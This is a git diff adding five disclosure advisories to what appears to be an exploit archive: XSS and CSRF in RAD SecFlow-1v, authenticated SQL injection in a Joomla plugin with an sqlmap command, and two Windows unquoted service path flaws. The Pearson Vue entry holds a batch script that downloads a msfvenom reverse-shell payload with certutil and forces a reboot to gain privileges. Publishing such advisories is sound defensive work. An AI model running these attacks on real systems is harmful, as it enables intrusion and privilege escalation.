diff --git a/exploits/hardware/webapps/48807.txt b/exploits/hardware/webapps/48807.txt
new file mode 100644
index 000000000..8f204714e
--- /dev/null
+++ b/exploits/hardware/webapps/48807.txt
@@ -0,0 +1,37 @@
+# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
+# Date: 2020-08-31
+# Exploit Author: Jonatan Schor and Uriel Yochpaz
+# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
+# Version: SecFlow-1v os-image SF_0290_2.3.01.26
+# Tested on: RAD SecFlow-1v
+# CVE : N/A
+
+A Stored-XSS vulnerability was found in multiple pages in the web-based
+management interface of RAD SecFlow-1v.
+An attacker could exploit this vulnerability by uploading a malicious file
+as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as
+the static key file in Configuration-Services-Security-OpenVPN-Static Keys.
+These files content is presented to users while executing malicious stored
+JavaScript code.
+This could be exploited in conjunction with CVE-2020-13259
+
+# Proof of Concept
+Upload a file containing the following JS code:
+
+Refresh the page and observe the malicious JS code execute every time you
+browse the compromised page.
+
+# Full Account Takeover
+As mentioned above, this exploit could be used in conjunction with
+CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file
+to a Stored-XSS vulnerabale page, which could allow Full Account Takeover.
+For further information and full PoC:
+https://github.com/UrielYochpaz/CVE-2020-13259
+
+# Timeline
+May 19th, 2020 - Vulnerability exposed.
+May 19th, 2020 – Vulnerability reported to RAD.
+May 21th, 2020 – Vulnerability reported to MITRE.
+May 21th, 2020 – MITRE assigned CVE: CVE-2020-13260.
+May 22th, 2020 – Contacted RAD for further details and cooperation.
+Aug 25th, 2020 – RAD patched the vulnerability.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48809.txt b/exploits/hardware/webapps/48809.txt
new file mode 100644
index 000000000..ee4dfb987
--- /dev/null
+++ b/exploits/hardware/webapps/48809.txt
@@ -0,0 +1,43 @@
+# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
+# Date: 2020-08-31
+# Exploit Author: Uriel Yochpaz and Jonatan Schor
+# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
+# Version: SecFlow-1v os-image SF_0290_2.3.01.26
+# Tested on: RAD SecFlow-1v
+# CVE : N/A
+
+A vulnerability in the web-based management interface of RAD SecFlow-1v
+could allow an unauthenticated, remote attacker to conduct a cross-site
+request forgery (CSRF) attack on an affected system.
+The vulnerability is due to insufficient CSRF protections for the web UI on
+an affected device.
+An attacker could exploit this vulnerability by persuading a user of the
+interface to follow a malicious link. A successful exploit could allow the
+attacker to perform arbitrary actions with the privilege level of the
+affected user.
+This could be exploited in conjunction with CVE-2020-13260.
+
+# Proof of Concept
+By persuading an authenticated user to open a web page containing the
+following code:
+
+A reboot operation would begin.
+This attack could execute any operation available at the web-based
+management interface (File uploads, Scheduled and immediate reboots,
+Factory reset etc.)
+
+# Full Account Takeover
+As mentioned above, this exploit could be used in conjunction with
+CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a
+malicious file to a Stored-XSS vulnerabale page, which could allow Full
+Account Takeover.
+For further information and full PoC:
+https://github.com/UrielYochpaz/CVE-2020-13259
+
+# Timeline
+May 19th, 2020 - Vulnerability exposed.
+May 19th, 2020 – Vulnerability reported to RAD.
+May 21th, 2020 – Vulnerability reported to MITRE.
+May 21th, 2020 – MITRE assigned CVE: CVE-2020-13259.
+May 22th, 2020 – Contacted RAD for further details and cooperation.
+Aug 25th, 2020 – RAD patched the vulnerability.
\ No newline at end of file
diff --git a/exploits/php/remote/46698.rb b/exploits/php/remote/46698.rb
index 2471ac3ec..80a60cf04 100755
--- a/exploits/php/remote/46698.rb
+++ b/exploits/php/remote/46698.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' =>
[
- ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html']
+ ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],
['URL', 'http://cutephp.com'] # Official Website
],
'Platform' => 'php',
diff --git a/exploits/php/webapps/48811.txt b/exploits/php/webapps/48811.txt
new file mode 100644
index 000000000..69f2b7c7e
--- /dev/null
+++ b/exploits/php/webapps/48811.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)
+# Date: 2020-08-21
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.corephp.com/
+# Software Link: https://www.corephp.com/joomla-products/pago-commerce
+# Version: 2.5.9.0
+# Tested on: Apache2
+
+Vulnerable param: filter_published
+-------------------------------------------------------------------------
+POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 163
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments
+Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
+Upgrade-Insecure-Requests: 1
+
+filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
+
+-------------------------------------------------------------------------
+sqlmap poc:
+
+sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published
+
+
+[Gais Security]
+[Gais Security]
+[Gais Security]
+
+Mehmet KELEPÇE
+
+Penetration Tester | Red Team
\ No newline at end of file
diff --git a/exploits/windows/local/48808.txt b/exploits/windows/local/48808.txt
new file mode 100644
index 000000000..b897e1470
--- /dev/null
+++ b/exploits/windows/local/48808.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
+# Date: 2020-08-31
+# Exploit Author: Angelo D'Amato
+# Vendor Homepage: https://www.rapid7.com
+# Version: <=6.6.39
+# CVE :N/A
+
+Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation
+
+
+Vendor: Rapid7
+Product web page: https://www.rapid7.com
+Affected version: <=6.6.39
+
+Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support
+the entire vulnerability management lifecycle, including discovery, detection,
+verification, risk classification, impact analysis, reporting and mitigation.
+It integrates with Rapid7's Metasploit for vulnerability exploitation.
+
+Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path
+that contains an unquoted element, in which the element contains whitespace
+or other separators. This can cause the product to access resources in a parent
+path, allowing local privilege escalation.
+
+Tested on: Microsoft Windows 10 Enterprise, x64-based PC
+ Microsoft Windows Server 2016 Standard, x64-based PC
+
+
+Vulnerability discovered by Angelo D'Amato
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5587
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php
+
+
+07.08.2020
+
+--
+
+
+C:\Users\test>sc qc nexposeengine
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: nexposeengine
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Nexpose Scan Engine
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48810.txt b/exploits/windows/local/48810.txt
new file mode 100644
index 000000000..8b7c51131
--- /dev/null
+++ b/exploits/windows/local/48810.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
+# Discovery by: Jok3r
+# Discovery Date: 2020-09-14
+# Vendor Homepage: https://home.pearsonvue.com/
+# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
+# Tested Version: 2.3.1911
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+#Description:
+
+The Application Wrapper is the component that automates the Pearson VUE
+Testing System. The Wrapper is a scheduler that runs in the background on
+the test center’s server.
+VUEApplicationWrapper service has an unquoted service path vulnerability
+and insecure file permissions on "\Pearson VUE\" directory that allows to
+overwrite by everyone
+so that unauthorized local user can leverage privileges to VUEService user
+that has administrative rights.
+
+# Detection of unquoted service path:
+
+C:\Users\VUEService>wmic service get name, pathname, displayname, startmode
+| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |
+findstr /i /v """
+VUE Application Wrapper
+VUEApplicationWrapper C:\Pearson VUE\VUE
+Testing System\bin\VUEWrapper.exe
+Auto
+
+C:\Users\VUEService>sc qc VUEApplicationWrapper
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VUEApplicationWrapper
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing
+System\bin\VUEWrapper.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : VUE Application Wrapper
+DEPENDENCIES : lanmanworkstation
+SERVICE_START_NAME : .\VUEService
+
+
+#Detection of insecure file permissions:
+
+PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
+
+
+Directory: C:\
+
+
+Path Owner Access
+---- ----- ------
+Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
+
+
+#Exploit code:
+
+@ECHO OFF
+ECHO [+] executing command: "wmic service get
+name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i
+"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
+wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |
+findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+sc qc VUEApplicationWrapper
+powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
+ECHO [+] Enumeration was completed successfully.
+::Create VUE.exe with following commands on your kali and serve it on port
+80. Also listen port 443 with netcat for reverse shell.
+::msfvenom -p windows/x64/shell/reverse_tcp LHOST=
+LPORT=443 -f exe > VUE.exe
+ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your
+privileges, you might be able to get VUEService user privileges after
+windows was rebooted.
+certutil -urlcache -split -f http:///VUE.exe "C:\Pearson
+VUE\VUE.exe"
+ECHO [*] Downloading VUE executable...
+PAUSE
+IF EXIST "C:\Pearson VUE\VUE.exe" (
+ECHO [+] The download was successful.
+) ELSE (
+ECHO [-] The download was unsuccessful.
+PAUSE
+)
+ECHO [!] If you continue, system will be rebooted.
+PAUSE
+shutdown /r /t 0
+::code end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b26e60195..6d79fb100 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10379,6 +10379,8 @@ id,file,description,date,author,type,platform,port
48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows,
48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux,
48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows,
+48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
+48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40631,6 +40633,9 @@ id,file,description,date,author,type,platform,port
48801,exploits/hardware/webapps/48801.sh,"ZTE Router F602W - Captcha Bypass",2020-09-10,"Hritik Vijay",webapps,hardware,
48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple,
48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple,
+48807,exploits/hardware/webapps/48807.txt,"RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting",2020-09-14,"Jonatan Schor",webapps,hardware,
+48809,exploits/hardware/webapps/48809.txt,"RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)",2020-09-14,"Jonatan Schor",webapps,hardware,
+48811,exploits/php/webapps/48811.txt,"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)",2020-09-14,"Mehmet Kelepçe",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,